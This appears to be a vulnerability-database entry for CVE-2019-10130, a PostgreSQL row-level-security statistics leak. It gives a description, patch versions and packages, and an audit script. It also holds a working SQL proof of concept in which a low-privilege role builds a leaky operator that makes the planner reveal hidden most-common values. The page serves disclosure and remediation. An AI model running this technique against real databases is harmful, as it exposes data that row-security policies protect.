CVE-2019-10130

Description

A vulnerability was found in PostgreSQL 11.x before 11.3, 10.x before 10.8, 9.6.x before 9.6.13 and 9.5.x before 9.5.17 (row-level security was introduced in 9.5, so older branches are not affected). PostgreSQL maintains column statistics for tables. Certain statistics, such as histograms and lists of most common values, contain values taken from the column. PostgreSQL does not evaluate row security policies before consulting those statistics during query planning; an attacker can exploit this to read the most common values of certain columns. Affected columns are those for which the attacker has SELECT privilege and for which, in an ordinary query, row-level security prunes the set of rows visible to the attacker. Reading the pg_stats view directly is not the problem, since that view already hides tables whose row security applies to the current user; the leak is through the planner's selectivity estimators, which apply the query's operators to the stored statistics values, so a user-defined operator that is not leakproof can report those values back to the attacker. The fixed releases stop the planner from applying non-leakproof operators to the statistics of a table whose row security applies to the current user.
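The leak described above can be reproduced end to end. The script below is an added example written for this page; it is not PostgreSQL's own regression test and does not come from the advisory. The table, the roles, the values and the operator name are all constructed for the illustration, and it follows the mechanism named in the PostgreSQL 11.3 release notes: a user-defined operator that is not leakproof, wired to a built-in selectivity estimator, is applied by the planner to the column's most-common values. Run it with psql as a superuser on a disposable instance.

```sql
-- Added example for CVE-2019-10130 (constructed for this page; not from the PostgreSQL project).
-- Run as a superuser with psql on a throwaway database.

-- === Setup, as the table owner: an RLS-protected table with a skewed column ===
CREATE ROLE mallory;                          -- the low-privilege attacker (name assumed)
CREATE SCHEMA mallory AUTHORIZATION mallory;  -- somewhere mallory may create objects

CREATE TABLE payroll (
    id        serial  PRIMARY KEY,
    owner     text    NOT NULL,
    pay_grade integer NOT NULL   -- the column whose common values should stay private
);

-- 990 rows owned by alice with five repeating pay grades; 10 rows owned by mallory.
INSERT INTO payroll (owner, pay_grade)
SELECT 'alice', 40 + (g % 5) * 10 FROM generate_series(1, 990) g;   -- 40, 50, 60, 70, 80
INSERT INTO payroll (owner, pay_grade)
SELECT 'mallory', 1 FROM generate_series(1, 10);

ALTER TABLE payroll ENABLE ROW LEVEL SECURITY;
CREATE POLICY own_rows ON payroll FOR SELECT USING (owner = current_user);
GRANT SELECT ON payroll TO mallory;

ANALYZE payroll;   -- populates pg_statistic, including the most-common-values list

-- The owner bypasses RLS and can read the MCV list directly (pg_stats is a view over pg_statistic):
SELECT most_common_vals FROM pg_stats
 WHERE tablename = 'payroll' AND attname = 'pay_grade';

-- === Attack, as mallory ===
SET ROLE mallory;   -- new objects land in schema "mallory" via the default "$user" search_path

-- Through the policy, only her own rows are visible ...
SELECT DISTINCT pay_grade FROM payroll;   -- 1

-- ... and pg_stats hides RLS-protected tables from users subject to the policy (returns no row):
SELECT most_common_vals FROM pg_stats
 WHERE tablename = 'payroll' AND attname = 'pay_grade';

-- A "leaky" comparison: same result as integer <, but it reports its left-hand input.
-- PL/pgSQL functions are never leakproof, which is exactly what the attack relies on.
CREATE FUNCTION leaky_lt(integer, integer) RETURNS boolean
LANGUAGE plpgsql AS $$
BEGIN
    RAISE NOTICE 'planner evaluated me against %', $1;
    RETURN $1 < $2;
END $$;

-- Wrap it in an operator that borrows the built-in "less than" selectivity estimator.
CREATE OPERATOR <<< (
    LEFTARG   = integer,
    RIGHTARG  = integer,
    PROCEDURE = leaky_lt,
    RESTRICT  = scalarltsel
);

-- EXPLAIN plans but never executes, so no table row is ever handed to leaky_lt here.
-- Any NOTICE printed comes from scalarltsel applying <<< to pg_statistic entries.
EXPLAIN SELECT * FROM payroll WHERE pay_grade <<< 55;

-- Cleanup
RESET ROLE;
DROP TABLE payroll;
DROP SCHEMA mallory CASCADE;
DROP ROLE mallory;
```

On an unpatched server (11.2, for instance) the EXPLAIN emits one NOTICE per most-common value: 40, 50, 60, 70, 80 and 1, five of which belong only to rows the policy hides from mallory. On 11.3, 10.8, 9.6.13, 9.5.17 and later the planner refuses to apply a non-leakproof operator to the statistics of a table whose row security applies to the current user, so the EXPLAIN prints nothing and the estimate falls back to a default; executing the query normally still calls leaky_lt, but only on the rows mallory is allowed to see. The reproduction needs the low-privilege role to be able to create a function in a trusted language and an operator, which is the default for the public schema in these releases; the dedicated schema above just keeps the test objects tidy.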

Risk Information

Base Score: 4.3 (MODERATE)
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
EPSS Score (Exploitation Probability): 0.203

Associated Vulnerability

Vulnerability | OS Platform
Update Postgresql to version 10.8 | Windows
Update Postgresql to version 11.3 | Windows
Update Postgresql to version 9.5.17 | Windows
Update Postgresql to version 9.6.13 | Windows
Vulnerabilities CVE-2019-10130, CVE-2019-10129, CVE-2019-10128, CVE-2019-10127 are fixed in PostgreSQL 11.3 | Windows
Vulnerabilities CVE-2019-10130, CVE-2019-10128, CVE-2019-10127 are fixed in PostgreSQL 10.8 | Windows
Vulnerabilities CVE-2019-10130, CVE-2019-10128, CVE-2019-10127 are fixed in PostgreSQL 9.6.13 | Windows
Vulnerabilities CVE-2019-10130, CVE-2019-10128, CVE-2019-10127 are fixed in PostgreSQL 9.5.17 | Windows
object-relational SQL database (USN-3972-1) postgresql-9.5_9.5.17-0ubuntu0.16.04.1_i386.deb | Linux
object-relational SQL database (USN-3972-1) postgresql-9.5_9.5.17-0ubuntu0.16.04.1_amd64.deb | Linux
postgresql-9.6 security update (DSA-4439-1) postgresql-9.6_9.6.13-0+deb9u1_i386.deb | Linux
postgresql-9.6 security update (DSA-4439-1) postgresql-9.6_9.6.13-0+deb9u1_amd64.deb | Linux
SUSE-SU-2019:1511-1 (SUSE Linux Enterprise Desktop 12-SP4) libecpg6-10.8-1.9.1.x86_64.rpm | Linux
SUSE-SU-2019:1511-1 (SUSE Linux Enterprise Desktop 12-SP3) libecpg6-debuginfo-10.8-1.9.1.x86_64.rpm | Linux
SUSE-SU-2019:1511-1 (SUSE Linux Enterprise Desktop 12-SP3) libpq5-10.8-1.9.1.x86_64.rpm | Linux
SUSE-SU-2019:1511-1 (SUSE Linux Enterprise Desktop 12-SP3) libpq5-32bit-10.8-1.9.1.x86_64.rpm | Linux
SUSE-SU-2019:1511-1 (SUSE Linux Enterprise Desktop 12-SP3) libpq5-debuginfo-10.8-1.9.1.x86_64.rpm | Linux
SUSE-SU-2019:1511-1 (SUSE Linux Enterprise Desktop 12-SP3) libpq5-debuginfo-32bit-10.8-1.9.1.x86_64.rpm | Linux
SUSE-SU-2019:1511-1 (SUSE Linux Enterprise Desktop 12-SP3) postgresql10-10.8-1.9.1.x86_64.rpm | Linux
SUSE-SU-2019:1511-1 (SUSE Linux Enterprise Desktop 12-SP3) postgresql10-debuginfo-10.8-1.9.1.x86_64.rpm | Linux
SUSE-SU-2019:1511-1 (SUSE Linux Enterprise Desktop 12-SP3) postgresql10-debugsource-10.8-1.9.1.x86_64.rpm | Linux
SUSE-SU-2019:1511-1 (SUSE Linux Enterprise Desktop 12-SP3) postgresql10-libs-debugsource-10.8-1.9.1.x86_64.rpm | Linux
Update Postgresql to version 10.8 (For Linux) | Linux
Update Postgresql to version 11.3 (For Linux) | Linux
Update Postgresql to version 9.5.17 (For Linux) | Linux
Update Postgresql to version 9.6.13 (For Linux) | Linux
(RHSA-2020:5619) postgresql:9.6 security update postgresql-9.6.20-1.module+el8.3.0+8938+7f0e88b6.x86_64.rpm | Linux
(RHSA-2020:5619) postgresql:9.6 security update postgresql-contrib-9.6.20-1.module+el8.3.0+8938+7f0e88b6.x86_64.rpm | Linux
(RHSA-2020:5619) postgresql:9.6 security update postgresql-debugsource-9.6.20-1.module+el8.3.0+8938+7f0e88b6.x86_64.rpm | Linux
(RHSA-2020:5619) postgresql:9.6 security update postgresql-docs-9.6.20-1.module+el8.3.0+8938+7f0e88b6.x86_64.rpm | Linux
(RHSA-2020:5619) postgresql:9.6 security update postgresql-plperl-9.6.20-1.module+el8.3.0+8938+7f0e88b6.x86_64.rpm | Linux
(RHSA-2020:5619) postgresql:9.6 security update postgresql-plpython3-9.6.20-1.module+el8.3.0+8938+7f0e88b6.x86_64.rpm | Linux
(RHSA-2020:5619) postgresql:9.6 security update postgresql-pltcl-9.6.20-1.module+el8.3.0+8938+7f0e88b6.x86_64.rpm | Linux
(RHSA-2020:5619) postgresql:9.6 security update postgresql-server-9.6.20-1.module+el8.3.0+8938+7f0e88b6.x86_64.rpm | Linux
(RHSA-2020:5619) postgresql:9.6 security update postgresql-server-devel-9.6.20-1.module+el8.3.0+8938+7f0e88b6.x86_64.rpm | Linux
(RHSA-2020:5619) postgresql:9.6 security update postgresql-static-9.6.20-1.module+el8.3.0+8938+7f0e88b6.x86_64.rpm | Linux
(RHSA-2020:5619) postgresql:9.6 security update postgresql-test-9.6.20-1.module+el8.3.0+8938+7f0e88b6.x86_64.rpm | Linux
(RHSA-2020:5619) postgresql:9.6 security update postgresql-test-rpm-macros-9.6.20-1.module+el8.3.0+8938+7f0e88b6.x86_64.rpm | Linux
Postgresql update (ELSA-2020-5619-1) postgresql-9.6.20-1.module+el8.3.0+9604+f0f52296.x86_64.rpm | Linux
Postgresql-contrib update (ELSA-2020-5619-1) postgresql-contrib-9.6.20-1.module+el8.3.0+9604+f0f52296.x86_64.rpm | Linux
Postgresql-docs update (ELSA-2020-5619-1) postgresql-docs-9.6.20-1.module+el8.3.0+9604+f0f52296.x86_64.rpm | Linux
Postgresql-plperl update (ELSA-2020-5619-1) postgresql-plperl-9.6.20-1.module+el8.3.0+9604+f0f52296.x86_64.rpm | Linux
Postgresql-plpython3 update (ELSA-2020-5619-1) postgresql-plpython3-9.6.20-1.module+el8.3.0+9604+f0f52296.x86_64.rpm | Linux
Postgresql-pltcl update (ELSA-2020-5619-1) postgresql-pltcl-9.6.20-1.module+el8.3.0+9604+f0f52296.x86_64.rpm | Linux
Postgresql-server update (ELSA-2020-5619-1) postgresql-server-9.6.20-1.module+el8.3.0+9604+f0f52296.x86_64.rpm | Linux
Postgresql-server-devel update (ELSA-2020-5619-1) postgresql-server-devel-9.6.20-1.module+el8.3.0+9604+f0f52296.x86_64.rpm | Linux
Postgresql-static update (ELSA-2020-5619-1) postgresql-static-9.6.20-1.module+el8.3.0+9604+f0f52296.x86_64.rpm | Linux
Postgresql-test update (ELSA-2020-5619-1) postgresql-test-9.6.20-1.module+el8.3.0+9604+f0f52296.x86_64.rpm | Linux
Postgresql-test-rpm-macros update (ELSA-2020-5619-1) postgresql-test-rpm-macros-9.6.20-1.module+el8.3.0+9604+f0f52296.x86_64.rpm | Linux
Rh-postgresql10-postgresql update (ELSA-2021-9290) rh-postgresql10-postgresql-10.15-1.el7.x86_64.rpm | Linux
Rh-postgresql10-postgresql-contrib update (ELSA-2021-9290) rh-postgresql10-postgresql-contrib-10.15-1.el7.x86_64.rpm | Linux
Rh-postgresql10-postgresql-contrib-syspaths update (ELSA-2021-9290) rh-postgresql10-postgresql-contrib-syspaths-10.15-1.el7.x86_64.rpm | Linux
Rh-postgresql10-postgresql-devel update (ELSA-2021-9290) rh-postgresql10-postgresql-devel-10.15-1.el7.x86_64.rpm | Linux
Rh-postgresql10-postgresql-docs update (ELSA-2021-9290) rh-postgresql10-postgresql-docs-10.15-1.el7.x86_64.rpm | Linux
Rh-postgresql10-postgresql-libs update (ELSA-2021-9290) rh-postgresql10-postgresql-libs-10.15-1.el7.x86_64.rpm | Linux
Rh-postgresql10-postgresql-plperl update (ELSA-2021-9290) rh-postgresql10-postgresql-plperl-10.15-1.el7.x86_64.rpm | Linux
Rh-postgresql10-postgresql-plpython update (ELSA-2021-9290) rh-postgresql10-postgresql-plpython-10.15-1.el7.x86_64.rpm | Linux
Rh-postgresql10-postgresql-pltcl update (ELSA-2021-9290) rh-postgresql10-postgresql-pltcl-10.15-1.el7.x86_64.rpm | Linux
Rh-postgresql10-postgresql-server update (ELSA-2021-9290) rh-postgresql10-postgresql-server-10.15-1.el7.x86_64.rpm | Linux
Rh-postgresql10-postgresql-server-syspaths update (ELSA-2021-9290) rh-postgresql10-postgresql-server-syspaths-10.15-1.el7.x86_64.rpm | Linux
Rh-postgresql10-postgresql-static update (ELSA-2021-9290) rh-postgresql10-postgresql-static-10.15-1.el7.x86_64.rpm | Linux
Rh-postgresql10-postgresql-syspaths update (ELSA-2021-9290) rh-postgresql10-postgresql-syspaths-10.15-1.el7.x86_64.rpm | Linux
Rh-postgresql10-postgresql-test update (ELSA-2021-9290) rh-postgresql10-postgresql-test-10.15-1.el7.x86_64.rpm | Linux
Vulnerabilities CVE-2019-10130, CVE-2019-10129, CVE-2019-10128, CVE-2019-10127 are fixed in PostgreSQL 11.3 (For Linux) | Linux
Vulnerabilities CVE-2019-10130, CVE-2019-10128, CVE-2019-10127 are fixed in PostgreSQL 10.8 (For Linux) | Linux
Vulnerabilities CVE-2019-10130, CVE-2019-10128, CVE-2019-10127 are fixed in PostgreSQL 9.6.13 (For Linux) | Linux
Vulnerabilities CVE-2019-10130, CVE-2019-10128, CVE-2019-10127 are fixed in PostgreSQL 9.5.17 (For Linux) | Linux
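To check an instance against the fix versions in the table above, here is an added audit script written for this page (it is not from the page's vendor or from PostgreSQL). It assumes it is run as a superuser so that pg_stats does not hide row-security-protected tables, and it lists the exposed surface for this CVE: tables with row-level security enabled whose columns carry a most-common-values list or a histogram.

```sql
-- Added audit for CVE-2019-10130 (constructed for this page). Run as a superuser:
-- pg_stats hides RLS-protected tables from users who are subject to their policies.

-- 1. Is this server still inside one of the affected ranges? server_version_num encodes
--    11.2 as 110002, 10.7 as 100007, 9.6.12 as 90612 and 9.5.16 as 90516. Row-level
--    security only exists since 9.5, so older branches do not carry this bug.
SELECT current_setting('server_version') AS version,
       CASE
         WHEN v BETWEEN 110000 AND 110002 THEN 'affected: upgrade to 11.3 or later'
         WHEN v BETWEEN 100000 AND 100007 THEN 'affected: upgrade to 10.8 or later'
         WHEN v BETWEEN  90600 AND  90612 THEN 'affected: upgrade to 9.6.13 or later'
         WHEN v BETWEEN  90500 AND  90516 THEN 'affected: upgrade to 9.5.17 or later'
         ELSE 'not in an affected range'
       END AS cve_2019_10130
  FROM (SELECT current_setting('server_version_num')::int AS v) AS srv;

-- 2. What could have leaked on an unpatched server: every column of an RLS-enabled table
--    that has statistics values stored in pg_statistic. The anyarray columns of pg_stats
--    cannot be passed to array_length directly, hence the ::text::text[] round trip.
SELECT s.schemaname,
       s.tablename,
       s.attname,
       c.relforcerowsecurity                                  AS force_rls,
       array_length(s.most_common_vals::text::text[], 1)      AS mcv_entries,
       array_length(s.histogram_bounds::text::text[], 1)      AS histogram_bounds
  FROM pg_stats     s
  JOIN pg_namespace n ON n.nspname = s.schemaname
  JOIN pg_class     c ON c.relnamespace = n.oid AND c.relname = s.tablename
 WHERE c.relrowsecurity
   AND (s.most_common_vals IS NOT NULL OR s.histogram_bounds IS NOT NULL)
 ORDER BY 1, 2, 3;
```

The first query is the go/no-go check; the second tells you which columns were readable through the planner while the server was unpatched, which is what an incident reviewer needs in order to decide whether the values in those MCV lists (customer identifiers, salaries, tenant names) warrant notification.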

Patch Details

No records found

References

https://nvd.nist.gov/vuln/detail/CVE-2019-10130
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10130